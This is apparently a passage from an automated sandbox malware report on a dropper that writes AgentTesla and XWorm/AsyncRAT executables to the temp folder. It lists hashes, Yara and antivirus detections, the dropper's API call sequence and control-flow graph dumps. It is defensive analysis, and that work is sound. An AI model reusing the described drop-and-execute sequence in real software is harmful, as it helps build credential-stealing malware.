                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:09:36:17
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"
                                                                                  Imagebase:0x4d0000
                                                                                  File size:240'128 bytes
                                                                                  MD5 hash:A21DF2C0CCA131EB534F520FD641ADB5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 88%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:09:36:17
                                                                                  Start date:25/11/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"
                                                                                  Imagebase:0xfa0000
                                                                                  File size:76'800 bytes
                                                                                  MD5 hash:068C99328320CAAA7C5F2D31B0FF214B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 82%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:86.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:47.1%
                                                                                    Total number of Nodes:17
                                                                                    Total number of Limit Nodes:1

                                                                                    Callgraph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    • Opacity -> Relevance
                                                                                    • Disassembly available
                                                                                    callgraph 0 Function_00401000 1 Function_00401190 1->0 4 Function_004012FA 1->4 6 Function_0040130F 1->6 2 Function_004012E2 3 Function_00401186 5 Function_0040130C

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040101D
                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00401034
                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040103F
                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00000000), ref: 0040104E
                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 0040109B
                                                                                    • GetTempFileNameA.KERNELBASE(00000000,00403024,00000000,00000000), ref: 004010B5
                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010CD
                                                                                    • sprintf.MSVCRT ref: 004010F5
                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00401115
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,-000000FB,?,00000000,?,?,?,00000000), ref: 0040112E
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00401135
                                                                                    • ShellExecuteA.SHELL32(00000000,00403010,?,00000000,00000000,00000001), ref: 0040114D
                                                                                    • FreeResource.KERNEL32(?,?,?,?,00000000), ref: 00401158
                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040116A
                                                                                    • ExitProcess.KERNEL32 ref: 00401180
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070623051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2070592492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2070652775.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_DJ5PhUwOsM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileResource$MoveTemp$CloseCreateExecuteExitFindFreeHandleLoadLockNamePathProcessShellSizeofWritesprintf
                                                                                    • String ID:
                                                                                    • API String ID: 797060354-0
                                                                                    • Opcode ID: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
                                                                                    • Instruction ID: ed3217094a55de5a2dfbc1ddfccbe6b008effd7532ee54a07616082715565e40
                                                                                    • Opcode Fuzzy Hash: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
                                                                                    • Instruction Fuzzy Hash: E0416671544301ABE3209F60DD49F9B76A8BB88705F000929F785B62D0DAF4D908CBAA

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070623051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2070592492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2070652775.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_DJ5PhUwOsM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                    • String ID:
                                                                                    • API String ID: 801014965-0
                                                                                    • Opcode ID: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
                                                                                    • Instruction ID: bb7eaed838f3bdbf73850c04b41ab919ceb6e8f5c29665124cd3a4758e11a842
                                                                                    • Opcode Fuzzy Hash: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
                                                                                    • Instruction Fuzzy Hash: 63414CB1801344AFDB20DFA4DA49AAA7BBCBB09711F20017FE941B72E1C7784941CB58

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:22
                                                                                    Total number of Limit Nodes:6
                                                                                    execution_graph 25729 e70848 25731 e7084e 25729->25731 25730 e7091b 25731->25730 25734 e71380 25731->25734 25739 e71488 25731->25739 25735 e7135b 25734->25735 25737 e7138b 25734->25737 25735->25731 25736 e71480 25736->25731 25737->25736 25743 e77ea8 25737->25743 25741 e71396 25739->25741 25740 e71480 25740->25731 25741->25731 25741->25740 25742 e77ea8 2 API calls 25741->25742 25742->25741 25744 e77eb2 25743->25744 25745 e77ecc 25744->25745 25748 64ffab8 25744->25748 25752 64ffab7 25744->25752 25745->25737 25750 64ffacd 25748->25750 25749 64ffce2 25749->25745 25750->25749 25751 64ffcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 25750->25751 25751->25750 25754 64ffacd 25752->25754 25753 64ffce2 25753->25745 25754->25753 25755 64ffcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 25754->25755 25755->25754

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 130 64f3100-64f3121 131 64f3123-64f3126 130->131 132 64f314c-64f314f 131->132 133 64f3128-64f3147 131->133 134 64f3155-64f3174 132->134 135 64f38f0-64f38f2 132->135 133->132 143 64f318d-64f3197 134->143 144 64f3176-64f3179 134->144 137 64f38f9-64f38fc 135->137 138 64f38f4 135->138 137->131 139 64f3902-64f390b 137->139 138->137 147 64f319d-64f31ac 143->147 144->143 145 64f317b-64f318b 144->145 145->147 256 64f31ae call 64f3918 147->256 257 64f31ae call 64f3920 147->257 149 64f31b3-64f31b8 150 64f31ba-64f31c0 149->150 151 64f31c5-64f34a2 149->151 150->139 172 64f34a8-64f3557 151->172 173 64f38e2-64f38ef 151->173 182 64f3559-64f357e 172->182 183 64f3580 172->183 185 64f3589-64f359c 182->185 183->185 187 64f38c9-64f38d5 185->187 188 64f35a2-64f35c4 185->188 187->172 189 64f38db 187->189 188->187 191 64f35ca-64f35d4 188->191 189->173 191->187 192 64f35da-64f35e5 191->192 192->187 193 64f35eb-64f36c1 192->193 205 64f36cf-64f36ff 193->205 206 64f36c3-64f36c5 193->206 210 64f370d-64f3719 205->210 211 64f3701-64f3703 205->211 206->205 212 64f371b-64f371f 210->212 213 64f3779-64f377d 210->213 211->210 212->213 216 64f3721-64f374b 212->216 214 64f38ba-64f38c3 213->214 215 64f3783-64f37bf 213->215 214->187 214->193 226 64f37cd-64f37db 215->226 227 64f37c1-64f37c3 215->227 223 64f374d-64f374f 216->223 224 64f3759-64f3776 216->224 223->224 224->213 230 64f37dd-64f37e8 226->230 231 64f37f2-64f37fd 226->231 227->226 230->231 234 64f37ea 230->234 235 64f37ff-64f3805 231->235 236 64f3815-64f3826 231->236 234->231 237 64f3809-64f380b 235->237 238 64f3807 235->238 240 64f383e-64f384a 236->240 241 64f3828-64f382e 236->241 237->236 238->236 245 64f384c-64f3852 240->245 246 64f3862-64f38b3 240->246 242 64f3832-64f3834 241->242 243 64f3830 241->243 242->240 243->240 247 64f3856-64f3858 245->247 248 64f3854 245->248 246->214 247->246 248->246 256->149 257->149
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                                                    • API String ID: 0-220072568
                                                                                    • Opcode ID: eec3a005ba1c30c370ccfb805916f927fe62b72b39630f96ae0df09d98f8baad
                                                                                    • Instruction ID: 0ea6145233d2ba28829ff9d5a7d8432d3626fca90562ef916bbc868432f7ea70
                                                                                    • Opcode Fuzzy Hash: eec3a005ba1c30c370ccfb805916f927fe62b72b39630f96ae0df09d98f8baad
                                                                                    • Instruction Fuzzy Hash: D8322D31E2061ACFCB15EFB5C99459DF7B2BF89300F50C69AD409A7264EB70AD85CB80

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 850 e73e80-e73ee6 852 e73f30-e73f32 850->852 853 e73ee8-e73ef3 850->853 855 e73f34-e73f8c 852->855 853->852 854 e73ef5-e73f01 853->854 856 e73f24-e73f2e 854->856 857 e73f03-e73f0d 854->857 864 e73fd6-e73fd8 855->864 865 e73f8e-e73f99 855->865 856->855 858 e73f11-e73f20 857->858 859 e73f0f 857->859 858->858 861 e73f22 858->861 859->858 861->856 866 e73fda-e73ff2 864->866 865->864 867 e73f9b-e73fa7 865->867 874 e73ff4-e73fff 866->874 875 e7403c-e7403e 866->875 868 e73fca-e73fd4 867->868 869 e73fa9-e73fb3 867->869 868->866 870 e73fb7-e73fc6 869->870 871 e73fb5 869->871 870->870 873 e73fc8 870->873 871->870 873->868 874->875 877 e74001-e7400d 874->877 876 e74040-e7408e 875->876 885 e74094-e740a2 876->885 878 e74030-e7403a 877->878 879 e7400f-e74019 877->879 878->876 881 e7401d-e7402c 879->881 882 e7401b 879->882 881->881 883 e7402e 881->883 882->881 883->878 886 e740a4-e740aa 885->886 887 e740ab-e7410b 885->887 886->887 894 e7410d-e74111 887->894 895 e7411b-e7411f 887->895 894->895 896 e74113 894->896 897 e74121-e74125 895->897 898 e7412f-e74133 895->898 896->895 897->898 899 e74127-e7412a call e70abc 897->899 900 e74135-e74139 898->900 901 e74143-e74147 898->901 899->898 900->901 905 e7413b-e7413e call e70abc 900->905 902 e74157-e7415b 901->902 903 e74149-e7414d 901->903 907 e7415d-e74161 902->907 908 e7416b-e7416f 902->908 903->902 906 e7414f-e74152 call e70abc 903->906 905->901 906->902 907->908 911 e74163 907->911 912 e74171-e74175 908->912 913 e7417f 908->913 911->908 912->913 914 e74177 912->914 915 e74180 913->915 914->913 915->915
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V9n$g $g
                                                                                    • API String ID: 0-2967446072
                                                                                    • Opcode ID: 0fd9230f2dea018a86fcf06a86f5781632a0ce281a9178d7d5f91cee87d041fa
                                                                                    • Instruction ID: 79319e075e75729c22dcbddbb1c3dd9e893ae5ea7df76d74e8090500bdc2b817
                                                                                    • Opcode Fuzzy Hash: 0fd9230f2dea018a86fcf06a86f5781632a0ce281a9178d7d5f91cee87d041fa
                                                                                    • Instruction Fuzzy Hash: 0D916DB0E002098FDF14DFA8C9857DEBBF2AF88354F14D129E419B7294EB749985DB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1042 64f7df0-64f7e0e 1043 64f7e10-64f7e13 1042->1043 1044 64f7e15-64f7e2f 1043->1044 1045 64f7e34-64f7e37 1043->1045 1044->1045 1048 64f7e38-64f7e43 1045->1048 1049 64f7e44-64f7e47 1045->1049 1050 64f7e5e-64f7e61 1049->1050 1051 64f7e49-64f7e57 1049->1051 1052 64f7e84-64f7e86 1050->1052 1053 64f7e63-64f7e7f 1050->1053 1058 64f7e59 1051->1058 1059 64f7e96-64f7eac 1051->1059 1056 64f7e8d-64f7e90 1052->1056 1057 64f7e88 1052->1057 1053->1052 1056->1043 1056->1059 1057->1056 1058->1050 1063 64f80c7-64f80ca 1059->1063 1064 64f7eb2-64f7ebb 1059->1064 1067 64f80cc-64f80d1 1063->1067 1065 64f80d2-64f80dc 1064->1065 1066 64f7ec1-64f7ede 1064->1066 1070 64f80de-64f8107 1065->1070 1071 64f812d-64f813e 1065->1071 1075 64f80b4-64f80c1 1066->1075 1076 64f7ee4-64f7f0c 1066->1076 1073 64f8109-64f810c 1070->1073 1079 64f813f 1071->1079 1080 64f8123-64f8127 1071->1080 1077 64f8112-64f8121 1073->1077 1078 64f8341-64f8344 1073->1078 1075->1063 1075->1064 1076->1075 1099 64f7f12-64f7f1b 1076->1099 1077->1080 1083 64f8140-64f8184 1077->1083 1081 64f8367-64f836a 1078->1081 1082 64f8346-64f8362 1078->1082 1079->1067 1079->1083 1080->1071 1085 64f8415-64f8417 1081->1085 1086 64f8370-64f837c 1081->1086 1082->1081 1097 64f818a-64f819b 1083->1097 1098 64f8315-64f832b 1083->1098 1089 64f841e-64f8421 1085->1089 1090 64f8419 1085->1090 1091 64f8387-64f8389 1086->1091 1089->1073 1094 64f8427-64f8430 1089->1094 1090->1089 1095 64f838b-64f8391 1091->1095 1096 64f83a1-64f83a5 1091->1096 1101 64f8395-64f8397 1095->1101 1102 64f8393 1095->1102 1103 64f83a7-64f83b1 1096->1103 1104 64f83b3 1096->1104 1111 64f81a1-64f81be 1097->1111 1112 64f8300-64f830f 1097->1112 1098->1078 1099->1065 1106 64f7f21-64f7f3d 1099->1106 1101->1096 1102->1096 1107 64f83b8-64f83ba 1103->1107 1104->1107 1115 64f7f43-64f7f6d 1106->1115 1116 64f80a2-64f80ae 1106->1116 1109 64f83bc-64f83bf 1107->1109 1110 64f83cb-64f8404 1107->1110 1109->1094 1110->1077 1132 64f840a-64f8414 1110->1132 1111->1112 1123 64f81c4-64f82ba call 64f6618 1111->1123 1112->1097 1112->1098 1129 64f8098-64f809d 1115->1129 1130 64f7f73-64f7f9b 1115->1130 1116->1075 1116->1099 1179 64f82bc-64f82c6 1123->1179 1180 64f82c8 1123->1180 1129->1116 1130->1129 1138 64f7fa1-64f7fcf 1130->1138 1138->1129 1143 64f7fd5-64f7fde 1138->1143 1143->1129 1144 64f7fe4-64f8016 1143->1144 1152 64f8018-64f801c 1144->1152 1153 64f8021-64f803d 1144->1153 1152->1129 1155 64f801e 1152->1155 1153->1116 1156 64f803f-64f8096 call 64f6618 1153->1156 1155->1153 1156->1116 1181 64f82cd-64f82cf 1179->1181 1180->1181 1181->1112 1182 64f82d1-64f82d6 1181->1182 1183 64f82d8-64f82e2 1182->1183 1184 64f82e4 1182->1184 1185 64f82e9-64f82eb 1183->1185 1184->1185 1185->1112 1186 64f82ed-64f82f9 1185->1186 1186->1112
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $eq$$eq
                                                                                    • API String ID: 0-2246304398
                                                                                    • Opcode ID: e23e1604a728269f7b0ae7e0793e263011366c08a1cc1526c2a04ce2388ac0e5
                                                                                    • Instruction ID: 5677f51bd864466ecd746af4e41b24ceef3275b65b5e2086afc5733ebcdb2877
                                                                                    • Opcode Fuzzy Hash: e23e1604a728269f7b0ae7e0793e263011366c08a1cc1526c2a04ce2388ac0e5
                                                                                    • Instruction Fuzzy Hash: 7202C030B206058FDB55DB64D990AAEB7F2FF85300F64896AE515DB395DB31EC42CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3aefda920bd9c969ee355746d0d9b8c2ba8e6bfe737c0b4d2d4bf8d66e80396a
                                                                                    • Instruction ID: 9fb3952ba26280366b4c465869fff66f2cdf52fac653b4630929071729c95d40
                                                                                    • Opcode Fuzzy Hash: 3aefda920bd9c969ee355746d0d9b8c2ba8e6bfe737c0b4d2d4bf8d66e80396a
                                                                                    • Instruction Fuzzy Hash: E163E731D10B1A8EDB11EF68C8846A9F7B1FF99300F15D79AE45977121EB70AAC4CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1849 e7e270-e7e292 1850 e7e2f6-e7e2fd 1849->1850 1851 e7e294-e7e2bf 1849->1851 1856 e7e2c6-e7e2d3 1851->1856 1858 e7e2d5-e7e2ee 1856->1858 1859 e7e2fe-e7e365 1856->1859 1858->1850 1869 e7e367-e7e369 1859->1869 1870 e7e36e-e7e37e 1859->1870 1871 e7e60d-e7e614 1869->1871 1872 e7e385-e7e395 1870->1872 1873 e7e380 1870->1873 1875 e7e5f4-e7e602 1872->1875 1876 e7e39b-e7e3a9 1872->1876 1873->1871 1879 e7e615-e7e68e 1875->1879 1880 e7e604-e7e608 call e77b10 1875->1880 1876->1879 1881 e7e3af 1876->1881 1880->1871 1881->1879 1883 e7e5a7-e7e5c2 call e70350 1881->1883 1884 e7e466-e7e487 1881->1884 1885 e7e5c4-e7e5e6 1881->1885 1886 e7e440-e7e461 1881->1886 1887 e7e54e-e7e574 1881->1887 1888 e7e3cd-e7e3ee 1881->1888 1889 e7e48c-e7e4ad 1881->1889 1890 e7e50c-e7e549 1881->1890 1891 e7e5e8-e7e5f2 1881->1891 1892 e7e3b6-e7e3c8 1881->1892 1893 e7e3f3-e7e415 1881->1893 1894 e7e4b2-e7e4da 1881->1894 1895 e7e4df-e7e507 1881->1895 1896 e7e41a-e7e43b 1881->1896 1897 e7e579-e7e5a5 1881->1897 1883->1871 1884->1871 1885->1871 1886->1871 1887->1871 1888->1871 1889->1871 1890->1871 1891->1871 1892->1871 1893->1871 1894->1871 1895->1871 1896->1871 1897->1871
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Xiq$$eq
                                                                                    • API String ID: 0-3760103188
                                                                                    • Opcode ID: 2130024edb2aeb936d8bd5ec23729e863f3033118d6304fe152923272793e89e
                                                                                    • Instruction ID: 11e94f4b4a50afb310c6051e2bac87bd9cfe825304785c27dbe46ad9af27a6fc
                                                                                    • Opcode Fuzzy Hash: 2130024edb2aeb936d8bd5ec23729e863f3033118d6304fe152923272793e89e
                                                                                    • Instruction Fuzzy Hash: C9B1D870B042589FCB08ABB9A85467E7BA7BFC8700B14C56EE40BEB395DE34DC019791

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1949 e74a98-e74afe 1951 e74b00-e74b0b 1949->1951 1952 e74b48-e74b4a 1949->1952 1951->1952 1953 e74b0d-e74b19 1951->1953 1954 e74b4c-e74b65 1952->1954 1955 e74b3c-e74b46 1953->1955 1956 e74b1b-e74b25 1953->1956 1961 e74b67-e74b73 1954->1961 1962 e74bb1-e74bb3 1954->1962 1955->1954 1957 e74b27 1956->1957 1958 e74b29-e74b38 1956->1958 1957->1958 1958->1958 1960 e74b3a 1958->1960 1960->1955 1961->1962 1963 e74b75-e74b81 1961->1963 1964 e74bb5-e74bcd 1962->1964 1965 e74ba4-e74baf 1963->1965 1966 e74b83-e74b8d 1963->1966 1971 e74c17-e74c19 1964->1971 1972 e74bcf-e74bda 1964->1972 1965->1964 1967 e74b91-e74ba0 1966->1967 1968 e74b8f 1966->1968 1967->1967 1970 e74ba2 1967->1970 1968->1967 1970->1965 1973 e74c1b-e74c33 1971->1973 1972->1971 1974 e74bdc-e74be8 1972->1974 1980 e74c35-e74c40 1973->1980 1981 e74c7d-e74c7f 1973->1981 1975 e74c0b-e74c15 1974->1975 1976 e74bea-e74bf4 1974->1976 1975->1973 1978 e74bf6 1976->1978 1979 e74bf8-e74c07 1976->1979 1978->1979 1979->1979 1982 e74c09 1979->1982 1980->1981 1983 e74c42-e74c4e 1980->1983 1984 e74c81-e74d08 1981->1984 1982->1975 1985 e74c71-e74c7b 1983->1985 1986 e74c50-e74c5a 1983->1986 1994 e74d11-e74d31 1984->1994 1995 e74d0a-e74d10 1984->1995 1985->1984 1987 e74c5e-e74c6d 1986->1987 1988 e74c5c 1986->1988 1987->1987 1990 e74c6f 1987->1990 1988->1987 1990->1985 1999 e74d3b-e74d71 1994->1999 1995->1994 2002 e74d73-e74d77 1999->2002 2003 e74d81-e74d85 1999->2003 2002->2003 2004 e74d79 2002->2004 2005 e74d87-e74d8b 2003->2005 2006 e74d95-e74d99 2003->2006 2004->2003 2005->2006 2007 e74d8d 2005->2007 2008 e74d9b-e74d9f 2006->2008 2009 e74da9-e74dad 2006->2009 2007->2006 2008->2009 2010 e74da1 2008->2010 2011 e74daf-e74db3 2009->2011 2012 e74dbd-e74dc1 2009->2012 2010->2009 2011->2012 2015 e74db5 2011->2015 2013 e74dc3-e74dc7 2012->2013 2014 e74dd1-e74dd5 2012->2014 2013->2014 2016 e74dc9-e74dcc call e70abc 2013->2016 2017 e74dd7-e74ddb 2014->2017 2018 e74de5 2014->2018 2015->2012 2016->2014 2017->2018 2020 e74ddd-e74de0 call e70abc 2017->2020 2022 e74de6 2018->2022 2020->2018 2022->2022
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: g $g
                                                                                    • API String ID: 0-3051590014
                                                                                    • Opcode ID: 00284d62c496029bda56b4bfa0d65de547d0068b4dd7ea232ba468ed90c3d28a
                                                                                    • Instruction ID: 8da6d136e27a733886a0ff221b8acdf0b36d2aed3573dfcfd1b828c0d067d696
                                                                                    • Opcode Fuzzy Hash: 00284d62c496029bda56b4bfa0d65de547d0068b4dd7ea232ba468ed90c3d28a
                                                                                    • Instruction Fuzzy Hash: ADB14DB1E002098FDB20CFA9C98579DBBF2AF88358F14D129D859F7294EB749C45CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d922d9a45c2faf9f675cff3351b2261e289ce3ff72882e87268d29e9f0adf813
                                                                                    • Instruction ID: 6c0203efdd1bbfb28c388a0b74f1bfbebaffbba8bc71436adb5707ef09d94491
                                                                                    • Opcode Fuzzy Hash: d922d9a45c2faf9f675cff3351b2261e289ce3ff72882e87268d29e9f0adf813
                                                                                    • Instruction Fuzzy Hash: C543E631D10B1A8EDB11EF68C8846A9F7B1FF99300F51D79AE45977121EB70AAC4CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ff28ecadc538844a41e08e84955259404807781bc4e225ee04febd161435470
                                                                                    • Instruction ID: 993b7fbfb4ba3715e537a1a2e3e57a91fc6d4c5f4b8615b1095fc82271f755a8
                                                                                    • Opcode Fuzzy Hash: 9ff28ecadc538844a41e08e84955259404807781bc4e225ee04febd161435470
                                                                                    • Instruction Fuzzy Hash: EF927730A102048FDB65CFA8C184A5EBBF2FF45314F5488AAE509AB365DB75ED81CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
